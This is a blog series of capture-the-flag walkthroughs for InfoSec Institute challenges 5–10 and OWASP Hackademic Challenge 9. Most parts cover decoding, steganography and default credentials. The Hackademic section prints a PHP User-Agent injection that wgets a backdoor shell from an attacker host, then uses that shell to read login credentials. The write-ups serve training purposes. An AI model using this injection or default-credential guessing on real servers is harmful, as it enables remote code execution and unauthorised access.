InfoSec Institute CTF Challenge #10

Another day, another challenge…

Today’s challenge will be on Challenge #10 from the InfoSec Institute CTF program.

Going to the following link we’re provided with the following page.

infosec_10_intro

Doing a right click view page source we see the following:

infosec_10_pagesource

There’s a listen button. If we click on that button we’re presented with a flag.nav file. Maybe the flag is in there? Let’s see.

Opening the file we noticed that the file is one second, and we can’t hear the audio.

Going back to the original page and doing a right click save link as… allows us to save the audio.

 

There’s a GREAT application called Audacity that can be used to change the pitch and speed of an audio file.

Going here you will be presented with the Audacity webpage.

Downloading Audacity and opening the flag.wav file we see the following:

infosec_10_flag_audacity

Playing the file it’s still inaudible.

Like I wrote above, with Audacity you can change the speed of sound of the audio without changing the pitch.

Going to the toolbar and selecting effects there’s a “changing speed” option. Clicking this option we can specify different speeds. After playing with the different speeds (.75x, .50x) and making it .22x and playing the audio again we can hear the flag.

The flag is:

infosecflag_is_sound.

We found the flag!

Lessons learned:

Our trick of doing the right click view source helped a little bit. When doing this we noticed that there is a file we needed to download. After downloading the file and playing the audio it was inaudible. Going to Google we downloaded an application that aided us to in interpreting the audio. After adjusting the speed we were able to get the flag.

InfoSec Institute CTF Challenge #9

Another day, another challenge…

Today’s challenge will be #9 from the InfoSec Institute CTF.

Going HERE we’re presented with the following:

infosec_9_intro

Doing our handy source of right clicking viewing the page source we see the following:

infosec_9_pagesource

We see that there’s a form that takes a username and password.

Using the hint from the challenge we know we’re looking for a CISCO IDS login.

Going to Google and typing in “common username and password for CISCO IDS” we’re presented with the following link.

Searching the link for username and passwords we see the following:

infosec_9_username_passwords

Going back to our login screen and entering the first username of “netangr” and password “attack” we get the following:

infosec_9_netangr

The username and password didn’t work 😦

Let’s try the second username of “root” and password of “attack”.

infosec_9_root

We’re presented with the flag… but it looks like gibberish.

infosec_9_flag

Inspecting the flag closely we noticed that it is backwards.

The flag is infosec_flagis_defaultpass!

Lesson learned:

Our handy trick of looking at the page source did not work. It revealed that challenge was using a form. Looking at the webpage we noticed that there is a hint – CISCO IDS. Using this information we know that most devices have a default username and password. Going to Google we found the webpage that listed a default username and password. The first username did not work, second one did. From that we found the flag even though to the naked eye one might ignore it. Looking at the flag again we noticed that the flag was written backwards. After putting the flag in the correct order we were able to see it.

InfoSec Institute CTF Challenge #8

Another day, another challenge…

Today’s challenge will be on CTF Challenge #8 from InfoSec Institute.

Going to the following link

We see the following page.

infosec_8_intro

We’re introduced with the downloading a file.

Doing our trick of right click, view page source we see the following:

infosec_8_pagesource

We see the file that we need to download called “app.exe”

Downloading and opening the file we noticed that the application is the netstat command listing our network information.

Since our tricks does not work, we need to find a way to view the source of the application.

One option is to use the linux strings command.

The strings command allows you to find English words in file.

If you are working on a Windows machine (like I am) you can download the cygwin emulator which allows you to do simple Linux commands on a Windows machine.

To download cygwin go here.

Note: Make sure when downloading that you add the binutils package to import the strings command.

Copy the app.exe file into the cygwin directory (that you specified in your installation) so you navigate to that file.

After downloading cygwin, and using the strings command we see the following:

infosec_8_flag

We found the flag – infosec_flagis_0x1a!

Lessons learned:

Again, our normal tricks of viewing the page source did not work. We noticed that when we executed the program that it was the netstat command getting information on our network. From there we decided that we would need to see the source of the application to see if the flag was hidden in there. Turns out it was. Overall lesson, be flexible with your tool belt and think outside of the box!

InfoSec Institute CTF Challenge #7

Another day, another challenge…

Today’s challenge will be exploring InfoSec Institute CTF Challenge #7.

Going to the following link we’re presented with the following:

infosec_7_beginning

Doing a right click we see the following:

infosec_7_pagesource

Hmm… this doesn’t provide us with any information.

Going to the developer tools (F12) we see the following:

infosec_7_developertools

Still not giving us a lot of information.

Next – we’re going to use Zap to spider the site to see if we can get anymore information.

To configure ZAP, review the following link HERE.

Spidering the site we’re still not seeing a lot of information…

infosec_7_zapproxy

Looking at the other pages of the challenge we notice that it is “level<number>” Let’s try to change from the 404.php to levelseven.php, and see what we get.

Changing the site we see a blank page:

infosec_7_levelseven

Going back to ZAP we see the following:

infosec_7_levelseven_ZAP

Looking at the response we notice that the levelseven.php returns a 200 “OK” status. Next to the status we see weird encoding. Looking at the end of the encoding it ends in “==”. Could this be base 64 encoding, let’s try it.

Going to Google, and typing in “base 64 decoder” we get the following link.

Putting in our encoding we get the following:
infosec_7_flagfound

We found the flag – infosec_flagis_youfoundit!

Lessons learned:

Don’t depend on one solution. You should have multiple tools in your tool belt! We tried the view page source, but that didn’t work. Looking at the network traffic inside the developer tools did not help either. When all else fails, we can use a proxy. After configuring the proxy we still noticed that we didn’t see anything. When we realized that the page did not follow the pattern of the other pages in the ctf challenge we decided to go to the real level seven page. Once we did this (with our intercepting proxy on) we noticed that we received a valid response with special 64 encoding. Decoding this, we were presented with the flag! The developer tried to do security through obscurity by presenting us with a red herring in the 404.php page. Security through obscurity doesn’t work as we found out the pattern of the challenge and was able to solve the challenge.

InfoSec Institute CTF Challenge #6

Another day,. another challenge…

Today’s challenge will be on the InfoSec Institute CTF Challenge #6.

See scenario below:

infosec_6_intro

Doing a page source we see the following:

infosec_6_pagesource

We see that there’s a pcap file if we select yes.

Opening Wireshark (which can be downloaded HERE)

We see the following:

infosec_6_wireshark

Wireshark is a program that is used to analyze network traffic. Most of the traffic in this file can be ignored as there is a lot of noise that is being displayed.

Looking at the first packet (UDP) we see the following:

infosec_6_udp_packet

We noticed there are a bunch of letters… possibly this is hexadecimal encoding?

Going to Google and searching for “hexadecimal decoding” we see the following link as the first result.

Clicking on the link and typing in the encoding we get the following:

infosec_6_finished

 

We found the flag!

Lessons learned:

  1. Download Wireshark!
  2. Inspect the packets, and pay attention to those that stand out. Usually the suspicious packets hold clues!
  3. These clues won’t give us the pot of gold on the first try. Most of the data will be obscured. So we will need to encode or decode the data
  4. Once we encode or decode usually the data will be there!

FYI – thenewboston on Youtube has a good beginner tutorial on Wireshark. Which can be found HERE.

OWASP Hackademic Challenge 9

Another day, another challenge.

Today’s post will be on the ninth challenge from the OWASP Hackademic Challenge.

Below is the scenario:

A friend of yours has set up a news blog at slagoff.com. However, he is kind of worried regarding the security of the news that gets posted on the blog and has asked you to check how secure it is.

Your objective is to determine whether any vulnerabilities exist that, if exploited, can grant access to the blog’s server.

Hint: A specially-tailored backdoor shell can be found at “http://www.really_nasty_hacker.com/shell.txt“.

Below is the solution

Clicking the first link we are presented with the following screen:

challenge9intro

Doing a right click, view page source we get the following:

challenge9pagesource

We noticed there’s a hidden field with the value of answer.php, with a name of page. Hmm… let’s see if we can access this page.

Putting the following address in the URL bar it seems we cannot access the file.

challenge9answerphpnotfound

From the description we know that we need to upload a file from http://www.really_nasty_hacker.com/shell.txt

We know that our page is using php. Let’s see if we can modify the User-Agent using php syntax.

Opening Tamper Data after we enter the comment we’re presented with the following:

challenge9tamperdatapart2

Changing the User-Agent to:

<?system(“wget http://www.really_nasty_hacker.com/shell.txt&#8221;);?>

Pressing “OK” we get the following:

challenge9successful

Our script was uploaded successfully!

Going to the new site we see the following:

challenge9commandline

Hmm… We’re presented with a command line similar to challenge 8!

Let’s do a ls to see what we have on the file system.

challenge9lsoutput

Well we see that there is a file named “sUpErDuPErL33T.txt”

Let’s see what’s in this file.

challenge9logininfo

We’re presented with login information.

Looking back at the command file we see the following file adminpanel.php

Going to that file we see the following:

challenge9adminportalphp

An admin portal!

Let’s enter our login information and see what we get:

challenge9adminportallogin

challenge9congrats

We passed the challenge!!!

Lessons learned:

We did our right click view page source which showed that we had a hidden file named answer.php. Trying to access this file didn’t help us. Next changing the user agent we were able to upload our file to the file system. Going to the file on the file system we noticed that the file allows us to execute commands. Executing the commands were able to find the login information and login successfully.

Use the knowledge you’ve learned to solve the next challenge. We were first introduced to user-agents in challenge #5 with the p0wnbrowser product. We know that we can change the user-agent to show content that we would’ve never noticed.

InfoSec Institute CTF Challenge #5

Another day, another challenge…

Today’s challenge is #5 from the InfoSec Institute CTF Challenge.

Clicking on the following link we’re presented with the following:

infosec_5_intro

After clicking on the checkbox to prevent the page from displaying additional dialogs, and adding “view-source:” to the URL box we see the following:

infosec_5_pagesource

When viewing the page source further the reason we were getting multiple alert boxes was that it was inside of an infinite for loop. Read more about for loops HERE.

Looking inside the for loop we see that there is a image field titled “aliens”. Clicking on the file we see the following:

infosec_5_aliens_gif

At first when I read the meme I was at a loss, as I have never seen or heard this quote before. After doing some digging online, it hit me. What if there’s another secret meaning to this message?

How does one add a secret inside of an image? Steganography.

Saving the image, and doing a quick Google search of Steganography decoder online we’re presented with this site.

Uploading our file, and pressing decode we get the following:

infosec_5_decode

Binary. OK… this doesn’t seem helpful, or is it?

Doing another Google search to decode binary to ASCII we’re presented with this link.

Entering our binary code, we get the following:

infosec_5_end

We found the flag!

Lessons learned:

  1. Don’t be deterred by the multiple alert boxes!
  2. Using our trick of adding “view-source:” to the beginning of the URL
  3. Reviewing the page source we noticed a file
  4. Opening file we noticed it was a meme
  5. Researching what meme meant
  6. After finding meaning using tools to extract data that we needed
  7. Not being deterred that the extracted data was not in our preferred format (words not binary)
  8. Used Google to research how we could get extracted data into preferred format (words not binary)
  9. Finally, finding our flag